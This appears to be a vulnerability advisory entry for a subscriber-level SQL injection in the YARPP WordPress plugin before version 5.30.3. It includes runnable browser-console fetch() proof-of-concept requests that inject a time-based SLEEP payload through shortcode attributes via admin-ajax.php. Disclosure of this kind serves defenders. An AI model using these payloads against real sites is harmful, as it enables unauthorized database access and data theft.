YARPP - Yet Another Related Posts Plugin < 5.30.3 - Subscriber+ SQLi

2023-04-2500:00:00

wpvulndb

235

yarpp plugin

subscriber

sql injection

developer console

web browser

blog

wordpress

exploit

EPSS

0.001

Percentile

31.8%

JSON

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.

Run the below command in the developer console of the web browser while being on the blog as a subscriber user (the reference id must be an existing post ID):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[yarpp reference_id='1' recent='1 DAY) AND (SELECT 42 FROM (SELECT(SLEEP(5)))b']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));


(Could not exploit the below so far, despite the data being injected)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[yarpp reference_id='1' limit='aa YOLO bla-bla-bla']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

EPSS

0.001

Percentile

31.8%

JSON

Related for WPEX-ID:574F7607-96D8-4EF8-B96C-0425AD7E7690